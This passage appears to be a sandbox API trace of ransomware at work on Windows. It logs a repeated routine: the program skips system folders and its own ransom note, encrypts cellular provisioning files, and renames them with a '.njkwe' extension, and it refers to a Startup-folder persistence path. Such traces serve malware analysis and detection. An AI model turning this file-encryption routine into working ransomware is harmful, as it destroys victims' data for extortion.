(lpString1="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.525] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\351__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\351__connections_cellular_sfr (réunion) (france)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.525] GetTickCount () returned 0x1153f57 [0078.525] GetTickCount () returned 0x1153f57 [0078.525] GetTickCount () returned 0x1153f57 [0078.525] GetTickCount () returned 0x1153f57 [0078.525] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.526] GetProcessHeap () returned 0xbe0000 [0078.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.526] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0078.527] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.527] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0078.527] GetProcessHeap () returned 0xbe0000 [0078.527] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.527] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.528] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.528] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.528] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.528] CloseHandle (hObject=0x43c) returned 1 [0078.528] GetProcessHeap () returned 0xbe0000 [0078.528] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.528] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\351__connections_cellular_sfr (réunion) (france)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\351__connections_cellular_sfr (réunion) (france)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.529] GetProcessHeap () returned 0xbe0000 [0078.529] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.529] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d02d4c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d02d4c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d02d4c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="352__C~1.PRO")) returned 1 [0078.529] lstrcmpiW (lpString1="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.529] lstrcmpiW (lpString1="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.529] lstrcmpiW (lpString1="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.529] lstrcmpiW (lpString1="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.529] lstrcmpiW (lpString1="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.529] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml") returned 160 [0078.529] StrStrIW (lpFirst="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.529] lstrcmpW (lpString1="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.529] lstrcmpW (lpString1="352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.529] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\352__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.529] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\352__connections_cellular_orange (romania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.530] GetTickCount () returned 0x1153f67 [0078.530] GetTickCount () returned 0x1153f67 [0078.530] GetTickCount () returned 0x1153f67 [0078.530] GetTickCount () returned 0x1153f67 [0078.530] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.530] GetProcessHeap () returned 0xbe0000 [0078.530] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.530] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0078.544] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.544] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0078.545] GetProcessHeap () returned 0xbe0000 [0078.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.545] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.545] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.545] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.545] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.545] CloseHandle (hObject=0x43c) returned 1 [0078.545] GetProcessHeap () returned 0xbe0000 [0078.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.545] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\352__connections_cellular_orange (romania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\352__Connections_Cellular_Orange (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\352__connections_cellular_orange (romania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.546] GetProcessHeap () returned 0xbe0000 [0078.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.546] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d02d4c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d02d4c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d02d4c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x314, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="353__C~1.PRO")) returned 1 [0078.546] lstrcmpiW (lpString1="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.546] lstrcmpiW (lpString1="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.546] lstrcmpiW (lpString1="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.546] lstrcmpiW (lpString1="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.546] lstrcmpiW (lpString1="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.546] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml") returned 165 [0078.546] StrStrIW (lpFirst="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.546] lstrcmpW (lpString1="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.546] lstrcmpW (lpString1="353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.546] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\353__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.546] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\353__connections_cellular_vodafone ro (romania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.546] GetTickCount () returned 0x1153f76 [0078.546] GetTickCount () returned 0x1153f76 [0078.546] GetTickCount () returned 0x1153f76 [0078.546] GetTickCount () returned 0x1153f76 [0078.547] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.547] GetProcessHeap () returned 0xbe0000 [0078.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.547] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x314, lpOverlapped=0x0) returned 1 [0078.548] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.548] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x314, lpOverlapped=0x0) returned 1 [0078.548] GetProcessHeap () returned 0xbe0000 [0078.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.548] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.548] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.548] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.549] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.549] CloseHandle (hObject=0x43c) returned 1 [0078.549] GetProcessHeap () returned 0xbe0000 [0078.549] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.549] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\353__connections_cellular_vodafone ro (romania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\353__Connections_Cellular_Vodafone RO (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\353__connections_cellular_vodafone ro (romania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.550] GetProcessHeap () returned 0xbe0000 [0078.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.550] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d02d4c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d02d4c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d02d4c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x3a6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", cAlternateFileName="354__C~1.PRO")) returned 1 [0078.550] lstrcmpiW (lpString1="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.550] lstrcmpiW (lpString1="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.550] lstrcmpiW (lpString1="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.550] lstrcmpiW (lpString1="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.550] lstrcmpiW (lpString1="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.550] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml") returned 165 [0078.550] StrStrIW (lpFirst="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.550] lstrcmpW (lpString1="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.550] lstrcmpW (lpString1="354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.550] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\354__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.550] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\354__connections_cellular_vodafone ro (romania)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.550] GetTickCount () returned 0x1153f76 [0078.550] GetTickCount () returned 0x1153f76 [0078.550] GetTickCount () returned 0x1153f76 [0078.550] GetTickCount () returned 0x1153f76 [0078.550] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.550] GetProcessHeap () returned 0xbe0000 [0078.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.551] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x3a6, lpOverlapped=0x0) returned 1 [0078.552] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.552] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x3a6, lpOverlapped=0x0) returned 1 [0078.552] GetProcessHeap () returned 0xbe0000 [0078.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.552] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.552] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.552] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.552] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.552] CloseHandle (hObject=0x43c) returned 1 [0078.553] GetProcessHeap () returned 0xbe0000 [0078.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.553] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\354__connections_cellular_vodafone ro (romania)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\354__Connections_Cellular_Vodafone RO (Romania)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\354__connections_cellular_vodafone ro (romania)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.554] GetProcessHeap () returned 0xbe0000 [0078.554] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.554] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d28fbc, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d28fbc, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d28fbc, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x392, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", cAlternateFileName="355__C~1.PRO")) returned 1 [0078.554] lstrcmpiW 